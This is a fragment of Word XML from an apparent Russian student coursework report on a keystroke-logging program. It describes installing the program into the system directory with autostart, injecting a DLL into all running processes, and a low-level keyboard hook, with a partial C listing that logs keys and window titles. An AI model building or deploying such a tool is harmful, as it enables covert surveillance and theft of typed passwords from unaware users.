      </w:pPr>
    </w:p>
    <w:p w:rsidR="0070493C" w:rsidRDefault="0070493C" w:rsidP="00532646">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="0070493C" w:rsidRDefault="00E47FA2" w:rsidP="0070493C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истемное проектирование</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00205E97" w:rsidRDefault="00C949A2" w:rsidP="00205E97">
      <w:pPr>
        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00205E97">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Данный проект включает в себя непосредственно два модуля: модуль для установки и инж</w:t>
      </w:r>
      <w:r w:rsidR="00205E97">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>екции динамической библиотеки</w:t>
      </w:r>
      <w:r w:rsidRPr="00205E97">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> и сама динамическая библиотека. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00205E97" w:rsidRDefault="00205E97" w:rsidP="00205E97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05E97">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.1 Способ взаимодействия пользователя и программы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00205E97" w:rsidRDefault="00205E97" w:rsidP="00205E97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пользователя с программой был разработан интуитивно понятный интерфейс лог-файлов.   </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00205E97" w:rsidRDefault="00205E97" w:rsidP="00205E97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взаимодействия пользователя с программой. </w:t>
      </w:r>
      <w:r w:rsidR="003E2ED4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Для запуска </w:t>
      </w:r>
      <w:r w:rsidR="00335965">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">и установки </w:t>
      </w:r>
      <w:r w:rsidR="003E2ED4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">программы </w:t>
      </w:r>
      <w:r w:rsidR="00335965">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>требуется запустить исполняющий файл программы от имени администратора. Программа автоматически установится на компьютер и запустится, начав писать лог-файлы.</w:t>
      </w:r>
      <w:r w:rsidR="00CA58F9">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> После чего работа с программой сводится к анализу лог-файлов.</w:t>
      </w:r>
      <w:r w:rsidR="00C8742B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C8742B" w:rsidRDefault="00C8742B" w:rsidP="00205E97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 w:rsidRPr="00C8742B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4.2 Структурная схема программы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C8742B" w:rsidRDefault="00C8742B" w:rsidP="00C8742B">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF47AE">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Работу программы можно разделить на бло</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ки, которые будут описаны далее.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C8742B" w:rsidRPr="00DF47AE" w:rsidRDefault="00C8742B" w:rsidP="00C8742B">
      <w:pPr>
        <w:ind w:firstLine="426"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009456B2" w:rsidRDefault="00C8742B" w:rsidP="00205E97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1 Исполня</w:t>
      </w:r>
      <w:r w:rsidR="009456B2">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>емый файл</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B4BB4" w:rsidRDefault="002B4BB4" w:rsidP="00205E97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 w:rsidRPr="002B4BB4">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2.1.1 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Блок установки программы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B4BB4" w:rsidRDefault="002B4BB4" w:rsidP="002B4BB4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установки программы исполняемый файл и рядом лежащая библиотек копируется из текущей директории в директорию операционной системы. И исполняемый файл заносится в автозагрузку.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002B4BB4" w:rsidRDefault="002B4BB4" w:rsidP="002B4BB4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 w:rsidRPr="002B4BB4">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="002B50CE">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">.2.1.2 </w:t>
      </w:r>
      <w:r w:rsidRPr="002B4BB4">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Блок инжекции библиотеки</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C203E3" w:rsidRDefault="002B4BB4" w:rsidP="002B4BB4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момент выполнения программы создаетс</w:t>
      </w:r>
      <w:r w:rsidR="00C203E3">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>я снимок всех текущих процессов. После чего во все процессы производится инжекция отслеживающей библиотеки.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00921EEF" w:rsidRDefault="00921EEF" w:rsidP="002B4BB4">
      <w:pPr>
        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00921EEF" w:rsidRDefault="00921EEF" w:rsidP="002B4BB4">
      <w:pPr>
        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C203E3" w:rsidRDefault="00C203E3" w:rsidP="002B4BB4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 w:rsidRPr="00921EEF">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>4.2.2 Инжектируемая библиотека</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E47FA2" w:rsidRPr="00205E97" w:rsidRDefault="00921EEF" w:rsidP="00546DFB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оток создает именованный мьютекс, если мьютекс уже был создан, то поток завершает работу. Далее поток создает лог-файл в заданной директории, в который будет записываться информация о активности пользователя. Устанавливается </w:t>
      </w:r>
      <w:r w:rsidR="00546DFB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>низкоуровневый хук, для отслеживания нажатия клавиш.</w:t>
      </w:r>
      <w:r w:rsidR="00C949A2" w:rsidRPr="00205E97">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0070493C" w:rsidRDefault="0070493C" w:rsidP="00532646">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0070493C" w:rsidRDefault="0070493C" w:rsidP="00532646">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0070493C" w:rsidRDefault="0070493C" w:rsidP="0070493C">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7545"/>
        </w:tabs>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E47FA2" w:rsidRDefault="00E47FA2" w:rsidP="00532646">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E47FA2" w:rsidRDefault="0077143A" w:rsidP="00E47FA2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ункциональное </w:t>
      </w:r>
      <w:r w:rsidR="006A38EE">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>проектирование</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000872BA" w:rsidRDefault="000872BA" w:rsidP="0072566D">
      <w:pPr>
        <w:spacing w:after="160"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включает в себя описание основных методов программы и их листинги.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C63D18" w:rsidRPr="0072566D" w:rsidRDefault="00C63D18" w:rsidP="0072566D">
      <w:pPr>
        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLine="348"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0072566D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidRPr="0095536E">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.1</w:t>
      </w:r>
      <w:r w:rsidRPr="0072566D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Процедура</w:t>
      </w:r>
      <w:r w:rsidR="0072566D" w:rsidRPr="0072566D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> установки хука</w:t>
      </w:r>
      <w:r w:rsidRPr="0072566D">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000872BA" w:rsidRPr="0095536E" w:rsidRDefault="000872BA" w:rsidP="0072566D">
      <w:pPr>
        <w:spacing w:after="160"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HOOK</w:t>
      </w:r>
      <w:r w:rsidRPr="0095536E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0072566D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SetWindowsHookEx</w:t>
      </w:r>
      <w:r w:rsidRPr="0095536E"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int</w:t>
      </w:r>
      <w:r w:rsidRPr="009553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Hook</w:t>
      </w:r>
      <w:r w:rsidRPr="0095536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OOKPROC</w:t>
      </w:r>
      <w:r w:rsidRPr="009553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pfn</w:t>
      </w:r>
      <w:r w:rsidRPr="0095536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INSTANCE</w:t>
      </w:r>
      <w:r w:rsidRPr="009553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Mod</w:t>
      </w:r>
      <w:r w:rsidRPr="0095536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WORD</w:t>
      </w:r>
      <w:r w:rsidRPr="009553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wThreadId</w:t>
      </w:r>
      <w:r w:rsidRPr="0095536E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">) - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>у</w:t>
      </w:r>
      <w:r w:rsidRPr="000872BA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>станавливает</w:t>
      </w:r>
      <w:r w:rsidRPr="0095536E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000872BA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>определяемую</w:t>
      </w:r>
      <w:r w:rsidRPr="0095536E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000872BA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>программой</w:t>
      </w:r>
      <w:r w:rsidRPr="0095536E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000872BA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>процедуру</w:t>
      </w:r>
      <w:r w:rsidRPr="0095536E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000872BA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>фильтра</w:t>
      </w:r>
      <w:r w:rsidRPr="0095536E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="0072566D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hook</w:t>
      </w:r>
      <w:r w:rsidRPr="0095536E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="000872BA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="0095536E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000872BA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>цепочку</w:t>
      </w:r>
      <w:r w:rsidRPr="0095536E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000872BA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>фильтров</w:t>
      </w:r>
      <w:r w:rsidRPr="0095536E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidRPr="0072566D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hook</w:t>
      </w:r>
      <w:r w:rsidRPr="0095536E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000872BA" w:rsidRDefault="000872BA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Hook </w:t>
      </w:r>
      <w:r w:rsidRPr="000872BA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">[in] Определяет тип устанавливаемой процедуры фильтра (hook). </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>В курсовом проекте у</w:t>
      </w:r>
      <w:r w:rsidRPr="000872BA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>станавливает</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ся процедура фильтра (</w:t>
      </w:r>
      <w:r w:rsidRPr="000872BA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>WH_KEYBOARD_LL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="000872BA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, которая осуществляет текущий контроль за низкоуровневыми событиями ввода данных с клавиатуры.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E47FA2" w:rsidRDefault="00F97D6F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pfn </w:t>
      </w:r>
      <w:r w:rsidRPr="00F97D6F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[in] Указатель на процедуру фильтра (hook). Если параметр dwThreadId равняется нулю или устанавливает идентификатор потока, созданного другим процессом, параметр lpfn должен указывать на процедуру фильтра (hook) в динамически подключаемой библиотеке (DLL). В противном случае, lpfn может указывать на процедуру фильтра (hook) в коде, связанном с текущим процессом.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F97D6F" w:rsidRDefault="00F97D6F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Mod </w:t>
      </w:r>
      <w:r w:rsidRPr="00F97D6F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[in] Дескриптор DLL, содержащий процедуры фильтра (hook), на которую указывает параметр lpfn.  параметр hMod должен быть установлен в ПУСТО (NULL), если  параметр dwThreadId устанавливает поток, созданный текущим процессом, и если процедура фильтра (hook) находится внутри кода, связанного с текущим процессом.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0072566D" w:rsidRDefault="00F97D6F" w:rsidP="0072566D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wThreadId </w:t>
      </w:r>
      <w:r w:rsidRPr="00F97D6F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[in] Устанавливает идентификатор потока с которым, процедура фильтра (hook) должна быть связана. Если этот параметр равняется нулю, процедура фильтра (hook) связывается со всеми существующими потоками, запущенными на том же самом рабочем столе, что и вызывающий поток.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D413B" w:rsidRPr="000D413B" w:rsidRDefault="000D413B" w:rsidP="0072566D">
      <w:pPr>
        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLine="348"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D413B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5.2 Низкоуровневый хук</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984B5C" w:rsidRDefault="00F97D6F" w:rsidP="0072566D">
      <w:pPr>
        <w:spacing w:after="160" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360" w:firstLine="348"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F97D6F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LRESULT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  <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CALLB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ACK</w:t>
      </w:r>
      <w:r w:rsidRPr="002E7A2E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002E7A2E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LowLevelKeyboardHook</w:t>
      </w:r>
      <w:r w:rsidRPr="002E7A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2E7A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Code</w:t>
      </w:r>
      <w:r w:rsidRPr="002E7A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PARAM</w:t>
      </w:r>
      <w:r w:rsidRPr="002E7A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Param</w:t>
      </w:r>
      <w:r w:rsidRPr="002E7A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PARAM</w:t>
      </w:r>
      <w:r w:rsidRPr="002E7A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Param</w:t>
      </w:r>
      <w:r w:rsidRPr="002E7A2E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">) - </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
      <w:r w:rsidRPr="00F97D6F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>истема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ызывает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эту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функцию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каждый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раз</w:t>
      </w:r>
      <w:r w:rsidRPr="002E7A2E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F97D6F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>когда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собирается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ставить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новое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событие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вода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с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клавиатуры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очередь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вода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данных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потока</w:t>
      </w:r>
      <w:r w:rsidRPr="002E7A2E">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00F97D6F">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Ввод с клавиатуры может исходить от локального драйвера клавиатуры или от вызовов функции keybd_event.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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Param </w:t>
      </w:r>
      <w:r w:rsidRPr="00984B5C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[in] Устанавливает идентификатор сообщения клавиатуры.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000D413B" w:rsidRDefault="00984B5C" w:rsidP="000D413B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2355"/>
        </w:tabs>
        <w:spacing w:after="24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Param </w:t>
      </w:r>
      <w:r w:rsidRPr="00984B5C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[in] Указатель на структуру KBDLLHOOKSTRUCT.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984B5C" w:rsidRPr="0095536E" w:rsidRDefault="000D413B" w:rsidP="000D413B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2355"/>
        </w:tabs>
        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="708"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D413B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">5.2.1 </w:t>
      </w:r>
      <w:r w:rsidR="00984B5C" w:rsidRPr="000D413B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Листинг</w:t>
      </w:r>
      <w:r w:rsidR="00984B5C" w:rsidRPr="000D413B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00984B5C" w:rsidRPr="000D413B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>функции</w:t>
      </w:r>
      <w:r w:rsidR="00984B5C" w:rsidRPr="000D413B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F75428" w:rsidRPr="000D413B">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LowLevelKeyboardHook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>LRESULT CALLBACK LowLevelKeyboardHook(int nCode, WPARAM wParam, LPARAM lParam)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  <w:t>GetKeyState(NULL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  <w:t>if (nCode == HC_ACTION &amp;&amp; (wParam == WM_KEYDOWN || wParam == WM_SYSKEYDOWN))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DWORD written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KBDLLHOOKSTRUCT *ks = (KBDLLHOOKSTRUCT*) lParam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YSTEMTIME st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CHAR moduleName[MAX_MODULE_NAME]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DWORD winID = NULL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HWND activeWindow = GetForegroundWindow(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GetWindowThreadProcessId(activeWindow, &amp;winID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GetWindowText(activeWindow, moduleName, MAX_MODULE_NAME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if (winID != prevWinID || strcmp(moduleName, prevModuleName))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prevWinID = winID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trcpy(prevModuleName, moduleName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printf(moduleName + strlen(moduleName), " : %d", winID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trcat(moduleName, "\r\n"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WriteFile(file, moduleName, strlen(moduleName), &amp;written, NULL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GetLocalTime(&amp;st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GetTimeFormat(LOCALE_SYSTEM_DEFAULT, 0, &amp;st, NULL, g_buf, MAX_BUFSIZE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trcat(g_buf, "</w:t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"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char * buf = g_buf + strlen(g_buf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if (getSysKey(ks-&gt;vkCode))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WriteFile(file, g_buf, strlen(g_buf), &amp;written, NULL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else if (getCharKey(ks-&gt;vkCode, ks-&gt;scanCode, (LPWORD) buf, winID))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trcpy(buf + 1, "\r\n"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WriteFile(file, g_buf, strlen(g_buf), &amp;written, NULL);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984B5C" w:rsidRPr="000D413B" w:rsidRDefault="00DF6EF9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984B5C" w:rsidRPr="000D413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trcat(g_buf, "[unknown]\r\n"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WriteFile(file, g_buf, strlen(g_buf), &amp;written, NULL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  <w:t>return CallNextHookEx(hook, nCode, wParam, lParam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</w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D413B">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00984B5C" w:rsidRDefault="00984B5C" w:rsidP="00F97D6F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00984B5C" w:rsidRDefault="00984B5C" w:rsidP="00F97D6F">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00984B5C" w:rsidRPr="00984B5C" w:rsidRDefault="00984B5C" w:rsidP="000D413B">
      <w:pPr>
        <w:spacing w:after="240" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00984B5C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
